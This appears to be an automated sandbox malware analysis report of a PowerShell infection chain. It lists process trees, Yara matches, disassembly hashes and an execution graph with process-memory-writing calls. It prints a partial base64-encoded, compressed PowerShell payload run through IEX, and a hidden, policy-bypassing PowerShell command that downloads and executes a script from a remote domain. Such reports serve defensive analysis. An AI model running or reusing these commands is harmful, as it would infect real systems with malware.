AA5AFgAYQA3AHIAMwBTAFAAMwBrAFUAeQBwAGIAMgB2AHgAUgAzAEQAbQBsAHcAbQBoAGgAcwBlAEwARQBmADkAaQBZAEwAZABCAE8AMwBYAFkAcwBjAFgAYgBDAEQAbQBhAGoAYQB0AGUAdAB3AHYANgBqAEQAZQBLAFYAMwB1AG8ASABaAFUAZABrAFcAUAA1ADAAUwBJAHQAbABXAFEAcABkAGUAZABVAEwAagBuAGwAcABCAEgATgBCAEEAeQB1AEIAOAB0AEsARABTAFIAdQBHAGEASABQAEYAVwBsAEEATwB5AGEASgBhAGoAIAAoACQAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAE0ATwBSAHkAcwBUAFIARQBBAE0AKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAKAAiAEYAcgBvAG0AQgAiACAAKwAiAGEAcwBlADYAIgAgACsAIAAiADQAUwB0AHIAaQBuAGcAIgApACgAIgBOAFkAKwB4AGIAbwBNAHcARgBFAFYALwA1AFkAawBsAE0ATgBnAGsAYQBsAE4AVgAyAFMASQA2AFoASwBqAFMAUwBBAHcAcwBEAEQASAA0AEUAVgB3AFoAUAA4AHQAKwB3AGUASAB2AFMAMQBwADEAdgBIAGMANAA5ADkAeQBhAFYAVwBCAHgAQwBkAFIAagBqAEoAQgBWAGgANwBZAHgAVABsAE8ASwBiAGIAMwBFAGgAdABMAGIANgAzADkAeABvAFkAUwBoAEgAdABIAGEAZAB0ADcASgBiAGUAdQBmAE8AVAA2AHoAeABBAGQAbQBJAEkANwBoAGQAcAAvAFEAOABhAGUASgBEAEoAbABJAE0AQgBxAHQAMABZAEYAQQBEADkAMwBpADEAYwBvAFgAagBqAHkASQBpAHEAWgBKAE8AUQAzAFgAegBPAEEARAA4AHYAeQBNAFMAWAB4ADEAMwA5AGcAegByAEsATwBNAGsAegB3AGoAeQB3AGEANwB5AHAAcQBWAFYAOABnAFAAUwBzADYAUwAwAGoAVQBIADQAMgA3ADUAWgBtAFQAMgA4AFYAQwBXAHUASgBNAEQARwBVAHMAegBCAHIANABIAHAAMABJAHcAcwA3AEkAeQBqAHUAVABMAGYAZgArACsATgB5ADkAegBOADgAaABaAEQANQB1AGkAdQBHAGEAcgA0AHQAKwBWAG0AaABlAEwAYwBQAHEAMQArAHcARQA9ACIAKQApACkAKQAsACAAWwBpAG8ALgBjAE8AbQBwAHIARQBzAHMASQBvAG4ALgBjAG8AbQBQAHIARQBTAFMAaQBPAG4AbQBPAEQARQBdADoAOgAoACIARABlACIAIAArACIAYwBvAG0AcAByAGUAcwBzACIAKQApACkALAAgAFsAdABFAHgAdAAuAEUAbgBjAG8ARABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA
                                                                                            Imagebase:0x2c0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:12:25:04
                                                                                            Start date:15/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:12:25:05
                                                                                            Start date:15/01/2025
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))"
                                                                                            Imagebase:0x2c0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2473160112.000000000668F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2473160112.0000000006898000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:12:25:05
                                                                                            Start date:15/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:12:25:36
                                                                                            Start date:15/01/2025
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                            Imagebase:0x2c0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Executed Functions

                                                                                              Function 052E73B0 Relevance: .7, Instructions: 669COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2165932144.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_52e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0a8226b01713ed543cf69c850431cd85f558818a029dc9efeaf2ef39b202177b
                                                                                              • Instruction ID: 949617a78de0abb735543e70c5096958737646143131f8f892d660fe3ea203b5
                                                                                              • Opcode Fuzzy Hash: 0a8226b01713ed543cf69c850431cd85f558818a029dc9efeaf2ef39b202177b
                                                                                              • Instruction Fuzzy Hash: 86526A30B00269CFEB28DB24D854B6DB7B2FF89304F558099D94AAB394DB74AD81CF51
                                                                                              Function 052E2DF0 Relevance: .2, Instructions: 222COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2165932144.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_52e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2c73c86f544c38cabf45747d745dea19f79aeb76097274c95a16fc2f6d8004a0
                                                                                              • Instruction ID: fb7d4620d6917cfb7a20389db9bd5dd07dff9e81915c85420a2c93c3717e3c49
                                                                                              • Opcode Fuzzy Hash: 2c73c86f544c38cabf45747d745dea19f79aeb76097274c95a16fc2f6d8004a0
                                                                                              • Instruction Fuzzy Hash: 8A91AA74A00205DFCB15CF59C494AAEFBB6FF88310B248669D556AB365C731FC81CBA0
                                                                                              Function 052E73AD Relevance: .1, Instructions: 136COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2165932144.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_52e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 60dbbd33524e68253f5d7bbb199a7e45de8c6f79d4bff407215a86e0e3378a40
                                                                                              • Instruction ID: 786d9daee8c441c51cdb1c60ed938bd4c7ace60764f00bc34e4d31e2a052ce75
                                                                                              • Opcode Fuzzy Hash: 60dbbd33524e68253f5d7bbb199a7e45de8c6f79d4bff407215a86e0e3378a40
                                                                                              • Instruction Fuzzy Hash: 53515E70B00269CFEB24DB68C854BADBBB2FF89300F158499D509AB394DB75AD41CF91
                                                                                              Function 052E7E22 Relevance: .0, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2165932144.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_52e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 662307f38550753df622cb38b205a056aa57f2ab336a62a5f12032047dbd2767
                                                                                              • Instruction ID: 73eaebd9bcd2fa5cdc87c9dc88eaf57e1218e38ac6b44102ab5388faba709d1c
                                                                                              • Opcode Fuzzy Hash: 662307f38550753df622cb38b205a056aa57f2ab336a62a5f12032047dbd2767
                                                                                              • Instruction Fuzzy Hash: 9A117370A04249DFCB08DFA4D855AADBFB1FF89314F185199D905BB261DB75AC01CFA0
                                                                                              Function 04E2D005 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2165134749.0000000004E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E2D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4e2d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 628ded94578e6c5b9d7f4df73b4f5c8cadb37944156f041c15f3071dd92ed5b8
                                                                                              • Instruction ID: 1ff1ed4344b904fdb2e72fb9f1f638635344ffecc4a87db5bb1c8c9508592c89
                                                                                              • Opcode Fuzzy Hash: 628ded94578e6c5b9d7f4df73b4f5c8cadb37944156f041c15f3071dd92ed5b8
                                                                                              • Instruction Fuzzy Hash: AC014C6240E3D49EE7128B259D94B52BFB4DF43228F19C0DBD9888F2A3C2695849C772
                                                                                              Function 04E2D01D Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2165134749.0000000004E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E2D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4e2d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4242511b963fcaae9eb345316016bdee4b40e1b30968a5fa4b0726c21271cac9
                                                                                              • Instruction ID: 2e7b1b0bcbd34d9382b85efc39c6638ca04bc03a73c056b400b377fa1adf4c66
                                                                                              • Opcode Fuzzy Hash: 4242511b963fcaae9eb345316016bdee4b40e1b30968a5fa4b0726c21271cac9
                                                                                              • Instruction Fuzzy Hash: 19012B72505354DAE7104F25EF80F67BF98DF41374F08D01ADF484B262C6B8A841C6B1
                                                                                              Function 052E7E52 Relevance: .0, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2165932144.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_52e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2ab996083de91823a8282e8ea4a506f13934f408c7e20befcfe6c8defea93673
                                                                                              • Instruction ID: 3eb86ade357800e47419de915d75f149d82ceaeda9dc06f5f573c10323e45d95
                                                                                              • Opcode Fuzzy Hash: 2ab996083de91823a8282e8ea4a506f13934f408c7e20befcfe6c8defea93673
                                                                                              • Instruction Fuzzy Hash: E9E0C0B4D0424A5FCF44DFB890411BEBFF5AA04200F1045AED419E7301D73445418F95
                                                                                              Function 052E7E60 Relevance: .0, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2165932144.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_52e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 44f60fec95b20d45f75a70c916609321c423dc2b51ee98acd7eb4047320af581
                                                                                              • Instruction ID: 9c0da1dc5b9efcd69cae54ad52729a8e48d2a73ed99b975f65c36d06787e2022
                                                                                              • Opcode Fuzzy Hash: 44f60fec95b20d45f75a70c916609321c423dc2b51ee98acd7eb4047320af581
                                                                                              • Instruction Fuzzy Hash: 4FE0B6B4D1424E9FCF88DFB994411BEFBF5AB48200F0089AE9829E3300E63446018FA5

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:7.2%
                                                                                              Total number of Nodes:69
                                                                                              Total number of Limit Nodes:11
                                                                                              execution_graph 63068 723f520 63069 723f566 GetCurrentProcess 63068->63069 63071 723f5c0 63069->63071 63072 723f5c7 GetCurrentThread 63069->63072 63071->63072 63073 723f605 GetCurrentProcess 63072->63073 63074 723f5fe 63072->63074 63075 723f63b 63073->63075 63074->63073 63084 723f0fc 63075->63084 63078 723f764 DuplicateHandle 63082 723f816 63078->63082 63079 723f6ac GetCurrentThreadId 63083 723f6eb 63079->63083 63085 723f780 DuplicateHandle 63084->63085 63086 723f675 63085->63086 63086->63078 63086->63079 63087 793d674 63088 793d680 63087->63088 63089 793d692 63088->63089 63094 7232cf0 63088->63094 63097 7232b78 63088->63097 63102 7232895 63088->63102 63107 7232920 63088->63107 63095 7232d36 GetSystemInfo 63094->63095 63096 7232d66 63095->63096 63096->63089 63100 7232aa8 63097->63100 63101 7232b91 63097->63101 63098 7232d36 GetSystemInfo 63099 7232d66 63098->63099 63099->63089 63100->63097 63100->63098 63101->63089 63105 723289b 63102->63105 63103 7232d36 GetSystemInfo 63104 7232d66 63103->63104 63104->63089 63105->63103 63106 7232a2e 63105->63106 63106->63089 63110 7232959 63107->63110 63108 7232d36 GetSystemInfo 63109 7232d66 63108->63109 63109->63089 63110->63108 63111 7232a2e 63110->63111 63111->63089 63112 78a59e0 63113 78a59f8 63112->63113 63114 78a5b03 63113->63114 63122 72338b8 63113->63122 63127 7233c38 63113->63127 63131 72338ab 63113->63131 63136 72334a4 63113->63136 63140 72333c0 63113->63140 63145 72333b0 63113->63145 63150 7233acf 63113->63150 63124 72338ec 63122->63124 63123 72339c3 63123->63114 63124->63123 63125 7233c99 WriteProcessMemory 63124->63125 63126 7233cd4 63125->63126 63126->63114 63128 7233c83 WriteProcessMemory 63127->63128 63130 7233cd4 63128->63130 63130->63114 63133 72338b8 63131->63133 63132 72339c3 63132->63114 63133->63132 63134 7233c99 WriteProcessMemory 63133->63134 63135 7233cd4 63134->63135 63135->63114 63137 72334a8 WriteProcessMemory 63136->63137 63139 7233cd4 63137->63139 63139->63114 63141 72333f8 63140->63141 63142 723344e 63141->63142 63143 7233c99 WriteProcessMemory 63141->63143 63142->63114 63144 7233cd4 63143->63144 63144->63114 63147 72333c0 63145->63147 63146 723344e 63146->63114 63147->63146 63148 7233c99 WriteProcessMemory 63147->63148 63149 7233cd4 63148->63149 63149->63114 63151 7233a2d 63150->63151 63154 7233ae8 63150->63154 63151->63150 63152 7233c99 WriteProcessMemory 63151->63152 63153 7233cd4 63152->63153 63153->63114

                                                                                              Executed Functions

                                                                                              Function 07232920 Relevance: 1.8, APIs: 1, Instructions: 314COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 517 7232920-7232957 518 7232959-7232960 517->518 519 723299d 517->519 521 7232962-723296f 518->521 522 7232971 518->522 520 72329a0-72329dc 519->520 528 72329e2-72329eb 520->528 529 7232a60-7232a6b 520->529 523 7232973-7232975 521->523 522->523 526 7232977-723297a 523->526 527 723297c-723297e 523->527 530 723299b 526->530 531 7232980-723298d 527->531 532 723298f 527->532 528->529 536 72329ed-72329f3 528->536 534 7232a7a-7232aa2 529->534 535 7232a6d-7232a70 529->535 530->520 533 7232991-7232993 531->533 532->533 533->530 543 7232b91-7232c10 534->543 544 7232aa8-7232ab1 534->544 535->534 538 7232cd1-7232d64 GetSystemInfo 536->538 539 72329f9-7232a06 536->539 549 7232d66 538->549 550 7232d6b-7232d7f 538->550 541 7232a57-7232a5e 539->541 542 7232a08-7232a2c 539->542 541->529 541->536 555 7232a53 542->555 556 7232a2e-7232a31 542->556 574 7232c12-7232c58 543->574 575 7232c5a-7232c6d 543->575 544->538 546 7232ab7-7232ae7 544->546 561 7232b31-7232b44 546->561 562 7232ae9-7232b2f 546->562 549->550 555->541 559 7232a33-7232a36 556->559 560 7232a3d-7232a50 556->560 559->560 563 7232b46-7232b4d 561->563 562->563 565 7232b75-7232b8b 563->565 566 7232b4f-7232b60 563->566 565->543 565->544 566->565 571 7232b62-7232b6e 566->571 571->565 576 7232c6f-7232c76 574->576 575->576 577 7232c85-7232cbc 576->577 578 7232c78-7232c7e 576->578 580 7232c52-7232c58 577->580 581 7232cbe-7232cce 577->581 578->577 580->576
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2509396665.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7230000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 99cf2e8667c876f1e87c467cf739aad57d423ab7b424ed30f2f0f4f612e582b2
                                                                                              • Instruction ID: 3715bee8db648c6be09104d7c6d37ae553024a4b56735d52e413029a27e9e063
                                                                                              • Opcode Fuzzy Hash: 99cf2e8667c876f1e87c467cf739aad57d423ab7b424ed30f2f0f4f612e582b2
                                                                                              • Instruction Fuzzy Hash: 72D12CB191021ADFDB21CFA9C484A9DFBF1FF88310F258659D858AB352D770A985CF80
                                                                                              Function 04E7C370 Relevance: 1.2, Instructions: 1170COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472618466.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4e70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c407353632b1a1caf5179b16e4085dfc4adbb40ab3df243c082bd7ad81b1bd2d
                                                                                              • Instruction ID: 541abb52ccdbcf0e01b5766e33076aa5b4684715a3faecd49ea5cc4005893830
                                                                                              • Opcode Fuzzy Hash: c407353632b1a1caf5179b16e4085dfc4adbb40ab3df243c082bd7ad81b1bd2d
                                                                                              • Instruction Fuzzy Hash: 68B21934A01249EFDB15CFA8D484AADBBF6FF88314F249559E805AB351CB71ED42CB90
                                                                                              Function 0AA4761B Relevance: .5, Instructions: 539COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2657 aa4761b-aa476c3 2664 aa476c9-aa4778c 2657->2664 2665 aa4779b-aa477e3 2657->2665 2664->2665 2696 aa4778e-aa47798 2664->2696 2670 aa47984-aa47a38 2665->2670 2671 aa477e9-aa4782b 2665->2671 2700 aa47af7-aa47b31 2670->2700 2701 aa47a3e-aa47af5 2670->2701 2679 aa47969-aa47978 2671->2679 2681 aa4797e-aa4797f 2679->2681 2682 aa47848-aa47857 2679->2682 2686 aa47d07-aa47d5c 2681->2686 2684 aa4785e-aa478d0 2682->2684 2685 aa47859 2682->2685 2697 aa478d7-aa4795e 2684->2697 2698 aa478d2 2684->2698 2685->2684 2703 aa47ff5-aa48023 2686->2703 2696->2665 2746 aa47960 2697->2746 2747 aa47963 2697->2747 2698->2697 2713 aa47b38-aa47b41 2700->2713 2701->2713 2708 aa47d61-aa47da2 2703->2708 2709 aa48029-aa4804a 2703->2709 2719 aa47da4 2708->2719 2720 aa47dab-aa47dac 2708->2720 2781 aa48050 call aa4b9a0 2709->2781 2782 aa48050 call aa4b998 2709->2782 2717 aa47cf2-aa47d01 2713->2717 2717->2686 2721 aa47b46-aa47b55 2717->2721 2719->2720 2724 aa47dd6-aa47e26 2719->2724 2725 aa47db1-aa47dc3 2719->2725 2726 aa47f42-aa47f87 2719->2726 2727 aa47e8e-aa47ef3 2719->2727 2728 aa47ef8-aa47f3d 2719->2728 2729 aa47f89-aa47f9b 2719->2729 2730 aa47e2b-aa47e89 2719->2730 2731 aa47fab-aa47fe4 2719->2731 2732 aa47fef 2720->2732 2733 aa47b57 2721->2733 2734 aa47b5c-aa47bdd 2721->2734 2723 aa48056-aa48098 2724->2732 2736 aa47dc5 2725->2736 2737 aa47dca-aa47dd1 2725->2737 2726->2732 2727->2732 2728->2732 2738 aa47fa2-aa47fa9 2729->2738 2739 aa47f9d 2729->2739 2730->2732 2731->2732 2732->2703 2733->2734 2769 aa47be3-aa47c0e 2734->2769 2770 aa47c6c-aa47c97 2734->2770 2736->2737 2737->2732 2738->2732 2739->2738 2746->2747 2747->2679 2771 aa47c15-aa47c67 2769->2771 2772 aa47c10 2769->2772 2773 aa47c9e-aa47ce1 2770->2773 2774 aa47c99 2770->2774 2779 aa47cec 2771->2779 2772->2771 2773->2779 2774->2773 2779->2717 2781->2723 2782->2723
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edcbd52571dce07e74f2b53708a07e0a9c76677a18e8ffbda27490bb607e6c0d
                                                                                              • Instruction ID: 11793631b7fe2a3de939447e3f2c7f4022f7f0b3b9502023c853b927333403b8
                                                                                              • Opcode Fuzzy Hash: edcbd52571dce07e74f2b53708a07e0a9c76677a18e8ffbda27490bb607e6c0d
                                                                                              • Instruction Fuzzy Hash: 2D52B5B4A00628CFDB64DF68C984B9AB7B2FB89305F1091D9D90DA7351DB34AE85CF50
                                                                                              Function 0AA4F5B8 Relevance: .2, Instructions: 219COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 062ec8065cb612e2287bd7519357d659cd98decdbef36cc54bfe4b5596ed7fab
                                                                                              • Instruction ID: 70b4c0f073ad0668aeb90928eab37cbc7c23a06564a89c1ba82c4d109a69b5db
                                                                                              • Opcode Fuzzy Hash: 062ec8065cb612e2287bd7519357d659cd98decdbef36cc54bfe4b5596ed7fab
                                                                                              • Instruction Fuzzy Hash: F2914B70A01208DFEB54CFA8D558BEEBBF2FB89300F105029E506AB395DB749945CF51
                                                                                              Function 0723F520 Relevance: 7.7, APIs: 5, Instructions: 233threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0723F5AD
                                                                                              • GetCurrentThread.KERNEL32 ref: 0723F5EB
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0723F628
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0723F6D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2509396665.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7230000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: d70a8bd2ba40b3d47e7c90a40e55e80c7c7f769d519c80fd70d50053d8548ed4
                                                                                              • Instruction ID: 530694b3cee35ee7670d0564d6f47c95980c13347b686673dfe9e0a44cee9b07
                                                                                              • Opcode Fuzzy Hash: d70a8bd2ba40b3d47e7c90a40e55e80c7c7f769d519c80fd70d50053d8548ed4
                                                                                              • Instruction Fuzzy Hash: 54A114B5900349DFDB14CFA9D588B9EBBF1EF88314F248459E419A7360DB78A944CF60
                                                                                              Function 07936F48 Relevance: 2.6, Strings: 1, Instructions: 1361COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $aEi
                                                                                              • API String ID: 0-4267779294
                                                                                              • Opcode ID: 2ef4c92c77ffceae2d7e527c6e58859b05c193e3f6b3f755a2908642cd8e840d
                                                                                              • Instruction ID: d04d1e4b80e15dd7c611cef4f68d2d1c56a8db4c095c731973e5711d6a4d004a
                                                                                              • Opcode Fuzzy Hash: 2ef4c92c77ffceae2d7e527c6e58859b05c193e3f6b3f755a2908642cd8e840d
                                                                                              • Instruction Fuzzy Hash: 3AA2D4F4B00206DFDB24CBA9D480A6ABBFAEFC5318F14856AD41A9B351DB71DC41CB91
                                                                                              Function 072338B8 Relevance: 1.8, APIs: 1, Instructions: 320COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 445 72338b8-72338ea 446 7233930 445->446 447 72338ec-72338f3 445->447 450 7233933-723396f 446->450 448 72338f5-7233902 447->448 449 7233904 447->449 451 7233906-7233908 448->451 449->451 459 7233971-723397a 450->459 460 72339eb-72339f6 450->460 453 723390a-723390d 451->453 454 723390f-7233911 451->454 458 723392e 453->458 456 7233913-7233920 454->456 457 7233922 454->457 461 7233924-7233926 456->461 457->461 458->450 459->460 464 723397c-7233982 459->464 462 7233a05-7233a27 460->462 463 72339f8-72339fb 460->463 461->458 471 7233ae8-7233b33 462->471 472 7233a2d-7233a36 462->472 463->462 466 7233988-7233995 464->466 467 7233c1c-7233c21 464->467 469 72339e2-72339e9 466->469 470 7233997-72339c1 466->470 476 7233c22-7233c59 467->476 469->460 469->464 482 72339c3-72339c6 470->482 483 72339de 470->483 504 7233b36-7233b94 471->504 472->467 475 7233a3c-7233a71 472->475 492 7233a73-7233a89 475->492 493 7233a8b-7233a9e 475->493 480 7233c5b-7233c89 476->480 489 7233c8b-7233c97 480->489 490 7233c99-7233cd2 WriteProcessMemory 480->490 485 72339d2-72339db 482->485 486 72339c8-72339cb 482->486 483->469 486->485 489->490 494 7233cd4-7233cda 490->494 495 7233cdb-7233cef 490->495 496 7233aa0-7233aa7 492->496 493->496 494->495 498 7233aa9-7233aba 496->498 499 7233acc-7233ae2 496->499 498->499 505 7233abc-7233ac5 498->505 499->471 499->472 511 7233b96-7233bac 504->511 512 7233bae-7233bc1 504->512 505->499 513 7233bc3-7233bca 511->513 512->513 514 7233bd9-7233be3 513->514 515 7233bcc-7233bd2 513->515 514->504 515->514
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2509396665.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7230000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aa8c37e38c61b9a936eb9075013e9930f96bed979151ff6b06583a49fc5b80b3
                                                                                              • Instruction ID: 2ce515458c7d047c1710aa117d2f6d14fa1750afa1ca77d3d3a5158f72c99a7b
